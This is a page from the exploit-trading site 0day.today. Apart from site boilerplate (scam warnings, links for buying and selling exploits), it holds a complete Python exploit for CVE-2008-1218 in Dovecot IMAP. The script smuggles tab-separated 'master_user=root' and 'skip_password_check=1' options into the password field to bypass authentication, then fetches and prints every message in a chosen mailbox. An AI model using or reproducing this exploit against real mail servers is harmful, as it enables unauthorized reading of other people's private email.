0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit
============================================================= Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit ============================================================= #lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit #Here's an exploit for the recent TAB vulnerability in Dovecot. #It's nothing special since in the wild there are few to none #targets because of the special option which has to be set. #see CVE Entry CVE-2008-1218 #Exploit written by Kingcope import sys import imaplib print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit" print "Prints out all E-Mails for any account if special configuration option is set" print "Exploit written by kingcope\n" if len(sys.argv)<3: print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0] exit(0); if len(sys.argv)>3 and sys.argv[3] == "-nossl": M = imaplib.IMAP4(sys.argv[1]) else: M = imaplib.IMAP4_SSL(sys.argv[1]) M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\""); M.select() print "login succeeded." typ, data = M.search(None, 'ALL') k=0 for num in data[0].split(): typ, data = M.fetch(num, '(RFC822)') print 'Message %s\n%s\n' % (num, data[0][1]) k=k+1 M.close() M.logout() print "Messages read: %s" % k # 0day.today [2024-11-15] #